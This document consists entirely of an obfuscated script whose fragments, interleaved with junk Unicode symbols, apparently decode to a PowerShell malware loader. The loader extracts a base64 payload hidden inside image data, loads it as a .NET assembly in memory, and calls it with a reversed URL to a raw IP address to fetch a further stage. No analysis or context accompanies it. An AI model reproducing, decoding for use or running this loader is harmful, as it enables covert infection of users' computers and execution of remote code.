⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cgB0⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷8⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷QgBB⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷RQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷XwBT⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷QQBS⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷+⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷RgBs⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷P⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷UwBF⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷Bf⤏ ꒼ ⛲ ⫰ 〷EU⤏ ꒼ ⛲ ⫰ 〷TgBE⤏ ꒼ ⛲ ⫰ 〷D4⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷BP⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷aQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷ZwBl⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷TwBm⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Zg⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷w⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷r⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷dQBi⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷By⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷Ew⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷WwBT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷ZQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷XQ⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷RgBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBC⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBk⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bb⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷eQBz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷ZQBt⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bg⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQBd⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷OgBM⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷EI⤏ ꒼ ⛲ ⫰ 〷eQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BB⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YgBs⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BU⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷JwBk⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷E8⤏ ꒼ ⛲ ⫰ 〷LgBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBl⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷7⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bt⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BN⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷VgBB⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷bwBr⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷L⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷bwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷WwBd⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBO⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷Sg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷D⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷x⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷1⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷OQ⤏ ꒼ ⛲ ⫰ 〷4⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷5⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷NQ⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷Lw⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷H⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 